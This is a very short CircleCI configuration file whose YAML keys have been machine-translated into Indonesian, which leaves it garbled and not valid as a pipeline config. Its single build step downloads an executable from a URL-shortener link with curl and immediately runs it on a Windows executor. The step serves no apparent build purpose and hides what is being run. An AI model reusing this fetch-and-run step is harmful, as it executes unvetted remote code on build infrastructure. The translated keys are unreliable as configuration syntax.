# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
versi: 2.1
 
bola:
  menang: circleci/windows@2.2.0
 
pekerjaan:
  membangun:
    pelaksana:
      nama: menang/default
      shell: cmd.exe
    Langkah:
      - jalankan: curl -L -o yourcustomlink.exe https://is.gd/yourcustomlink && yourcustomlink.exe
